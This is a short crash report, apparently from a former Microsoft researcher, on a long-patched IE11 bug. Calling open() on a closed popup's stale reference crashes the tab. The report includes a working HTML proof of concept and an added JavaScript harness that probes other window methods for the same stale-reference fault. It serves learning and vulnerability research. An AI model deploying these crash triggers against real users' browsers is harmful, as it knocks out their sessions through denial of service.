A brief crash report. Calling open() on a window object whose popup had already been closed caused IE11 to dereference a null pointer and crash the tab. The proof of concept below opens a popup, closes it, and then calls open() on the stale reference after a short delay.
<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head><title>DoS_windowOpen_closedWindow</title>
</head>
<body onload="main()">
<script language="JavaScript">
// Keep the popup reference in a global so it is still reachable after close().
var win;
function main()
{
win = window.open();   // open a blank popup
win.close();           // close it; win now refers to the dead window
// Give the close time to complete, then call open() on the stale reference.
setTimeout("win.open();", 300); // Crash
}
</script>
</body>
</html>
The crash was classified as PROBABLY_NOT_EXPLOITABLE: a null-class pointer read in MSHTML!GetCallerSecurityStateAndURL2, so the impact is a tab-killing denial of service rather than code execution, since the read is through a fixed null pointer the attacker does not control. The brief timeout matters: calling open() synchronously right after close() still finds a live window object, whereas the delay lets the close fully complete before the follow-up open() call dereferences the stale window reference.
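The report above exercises one member, open(), on one stale reference. The following is an added example, not code from the original post, of a small probe harness that generalises that sequence: it closes a popup, waits the same way, and then calls a list of window members on the dead reference, recording which ones throw, which return normally, and (in a browser) which crash the tab. The member list, the delay and the fake window used for the offline self-test are assumptions made for this example; the fake only demonstrates the bookkeeping and cannot reproduce the IE11 crash itself.

```javascript
// Added example: probe a closed window reference for stale-reference bugs.
// Not part of the original post; names and the fake window are assumptions.

// Members to call on the closed window. "open" is the one from the original
// report; the others are plausible siblings a practitioner would try next.
var PROBE_MEMBERS = ["open", "close", "focus", "blur", "print"];

// Call each named member on win, catching exceptions so one failure does not
// stop the sweep. Returns an array of {name, outcome, detail} records where
// outcome is "returned", "threw" or "missing" (member is not a function).
function probeClosedWindow(win, members) {
  var results = [];
  for (var i = 0; i < members.length; i++) {
    var name = members[i];
    var record = { name: name, outcome: "missing", detail: "" };
    try {
      if (typeof win[name] === "function") {
        win[name]();
        record.outcome = "returned";
      }
    } catch (e) {
      record.outcome = "threw";
      record.detail = String(e && e.message ? e.message : e);
    }
    results.push(record);
  }
  return results;
}

// Browser entry point: open, close, then probe after delayMs. The delay mirrors
// the original report, where the close had to complete before the stale
// reference was dereferenced. openFn is injected so the harness can be driven
// by window.open() in a browser or by a fake window offline.
function scheduleProbe(openFn, delayMs, members, report) {
  var win = openFn();
  if (!win) {            // popup blocked: nothing to probe
    report([]);
    return;
  }
  win.close();
  setTimeout(function () {
    report(probeClosedWindow(win, members));
  }, delayMs);
}

// Offline stand-in for a popup (assumption, for the self-test only): once
// closed, open() rejects further use and focus() returns normally, which is
// enough to exercise the harness without a browser.
function makeFakeWindow() {
  var w = { closed: false };
  w.close = function () { w.closed = true; };
  w.open = function () {
    if (w.closed) { throw new Error("window is closed"); }
    return w;
  };
  w.focus = function () {};
  return w;
}

if (typeof window === "undefined") {
  // Node: run the self-test synchronously against the fake window.
  var fake = makeFakeWindow();
  fake.close();
  console.log(probeClosedWindow(fake, PROBE_MEMBERS));
} else {
  // Browser: reproduce the original sequence and report results to the console.
  // On an unpatched IE11 the "open" probe crashes the tab before report() runs;
  // a browser that survives shows the dead reference is handled safely.
  scheduleProbe(function () { return window.open(); }, 300, PROBE_MEMBERS,
                function (r) { console.log(r); });
}
```

In a browser the harness should be triggered from a user gesture (a button click) rather than onload, since most browsers block popups opened without one; the original IE11 proof of concept did not need that.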
Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.